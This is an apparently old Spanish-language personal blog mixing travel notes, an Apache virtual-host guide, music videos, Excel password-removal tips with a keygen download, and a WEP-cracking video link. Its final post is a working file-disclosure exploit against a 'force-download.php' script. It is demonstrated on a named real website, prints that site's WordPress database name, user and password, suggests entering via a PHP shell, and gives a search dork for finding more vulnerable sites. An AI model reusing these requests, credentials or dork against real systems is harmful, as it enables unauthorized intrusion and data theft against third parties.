Fin de semana en Merida

Este fin de semana que paso me escape a merida a distraerme del trabajo y demas preocupaciones que me estaban causando demaciado estres. aqui les dejo unas fotos para que vean que lindo es mi merida :p
Mi linda merida:

Servidor en Linux Ubuntu Server – ( Manual completo )

Bueno me ahorrare la parte de la instalacion ya que aqui esta
http://www.forat.info/2008/08/12/servidor-en-linux-ubuntu-server-manual-completo/
ok, ya tenemos instalado nuestro servidor pero no queremos usar el no-ip que viene en el manual y tenemos nuestro propio dominio
les mostrare muy facil como lo tengo :p,

1.- hacer una cuenta free de DNS en cdmon. ( yo lo uso)
2.-agregar el dominio y te pedira que pongas la ip del server (el tuyo claro esta )
3.- entramos a nuestro server por ssh y nos vamos a cd /etc/apache2/sites-available una vez dentro encontraremos un archivo llamado default
lo abrimos con nano: nano default. y nos arrojara lo siguiente:
NameVirtualHost *

ServerAdmin email@dominio.com

DocumentRoot /var/www/

Options FollowSymLinks
AllowOverride None


Options Indexes FollowSymLinks MultiViews
AllowOverride None
Order allow,deny
allow from all


ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None
Order allow,deny
allow from all


ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/

AllowOverride None
Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch
Order allow,deny
Allow from all


ErrorLog /var/log/apache2/error.log

# Possible values include: debug, info, notice, warn, error, crit,
# alert, emerg.
LogLevel warn
y mas......ahora agregamos ServerName www.dominio.com abajo de DocumentRoot /var/www/

quedando de la siguiente manera

DocumentRoot /var/www/
ServerName www.dominio.com

ahora reiniciamos apache con /etc/init.d/apache2 restart
y ahora ya podran entrar a su servidor con su propio dominio;

si quieren agregar mas dominios solo tienen que copiar todo el desmadrito que trae el archivo default hacia abajo y cambiando :
DocumentRoot y Server Name y listo xDD
se aceptan criticas.

aclaro este texto esta escrito bajo experiencia xD investigando y bla bla bla :p

The BlackList By Zer0 Z0org


Clic Para ver mas grande :p

Aqui les traigo la BlackList segun Zer0 xDD buen wallpaper? xd pero el culo no se puso xDDD en fin puro emo de la red xDD buena zer0 ahi nos vemos pronto para echar las lagrimas xD digo chelas xD muajajajaja

Crackear claves wep

Bueno aca pongo un videotutorial un poco extenso de como crackear claves wep creado por Oscar Rovira.
Crackear claves wep = hackear claves de inalambricos


EPICA - Unleashed

Bueno Aqui les traigo el Nuevo video de Epica titulado Unleashed, es una buena rola de esta banda holandesa; simone simons i love you xD hahahaha

Problemas con password en hojas de excel?



Bueno no se si algunos les ah pasado esto como a mi camarada zer0 z0orgsobre este tema aqui comenta su experiencia y soluciones :p


Bueno pues me surgio est problemin, de que olvide la pass de una hoja de excel y pues pense
mergas y ahora quien podra defenderme? xDDD y en eso aparecio el chapulin googlorado.

jaja ya pues en mi super, duper, mega busqueda vi muchos programas que "crackeaban", y "recuperaban la pass", pero todo tiene un precio en esta ciber vida, shiale que mamds no?

En fin uno que es pobre, humilde y honrado pues a segir buscando pero alguno que sea gratuito
hasta que un alma se apiado de la pobreza ajena y en un blog me encontre con un programma llamado Excel Password Recovery con keygen y regalito y toda la cosa jaja nel no cierto esta limpio.

Y lo pruebo y nada que no anda con las hojas de excel del 2007, no pues le digo ami carnal el gothic que si tiene alguna version vieja , no que si que la 2003 ya pues le digo que me role una hoja con pass y ya pues la pongo en el programin y voala "crackeo" la contrase?a que ami parecer lo que hace es modificarla pero sabra la merga xDD.

Pero la hoja que yo queria crackear o recuperar el pass era con el office 2007 asi que el problema seguia xD.

Hasta que mi carnalillo el gothic me dice y para que querias esa madre, le platico el problema y me dice pues abrelo con el open office y yo no mams y ese que pedo recupera la contrase?a o que (todo bobo yo que no sabia que era el open office xD) y ya lo bajo, lo instalo y me quedo de a 6 ya que ni siquiera pedia la pass xD.

Asi que la conclusion:

Versiones viejas: Excel Password Recovery
Descarga:
http://rapidshare.com/files/231837817/Excel_password_recovery_www.zer0-z0org.com.zip

Actual: Open Office
Descarga:
http://openoffice.bouncer.osuosl.org/?product=OpenOffice.org&os=win&lang=es&version=3.1.0


PD: Para los que tienen dinero sea suyo o ajeno, aqui pueden crackear o recuperar la pass, comprando el producto.

https://www.cleverbridge.com/

Mis pi?Aventuras xD
Saludos, Zer0 z0orG

Explotando Full Source Diclosure Bugueando "force-download.php"

Leyendo un post de zeus en ddlr sobre esto me puse a googlear y encontre este script que es vulnerable al path dicluser force-download.php que te deja bajar hasta los chescos del server.

simplemente tenemos la web:

http://www.xxx.xx.xx/force-download.php?file=archivo.pdf
cambiamos el archivo.pdf por "force-download.php" para comprobar que es vulnerable. si te da a descargar proseguimos a bajar el index.php

http://www.xxx.xx.xx/force-download.php?file=index.php y sacaremos muchos mas datos. como el config.php entre otros
para prueba un boton:

http://www.expo2010chile.cl/force-download.php?file=force-download.php juaz baja,
http://www.expo2010chile.cl/force-download.php?file=index.php era de esperarce Grin
en este caso sacamos esto:
Código:

/** Loads the WordPress Environment and Template */
require('./wp2/wp-blog-header.php')

http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-blog-header.php
de este:
Código:

require_once( dirname(__FILE__) . '/wp-load.php' );


http://www.expo2010chile.cl/force-download.php?file=./wp2/wp-load.php

Código:

/** The config file resides in ABSPATH */
require_once( ABSPATH . 'wp-config.php' );


// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'wp2_expo2010chile');

/** MySQL database username */
define('DB_USER', 'wp2_eXpoCh1le');

/** MySQL database password */
define('DB_PASSWORD', 'wUyUBaTEphac8UG');

/** MySQL hostname */
define('DB_HOST', 'localhost');

y simplemente desde una php-shellentramos por el SQL y entramos directo a la db =D
happy hacking

dork: "allinurl: "force-download.php?file= .pdf""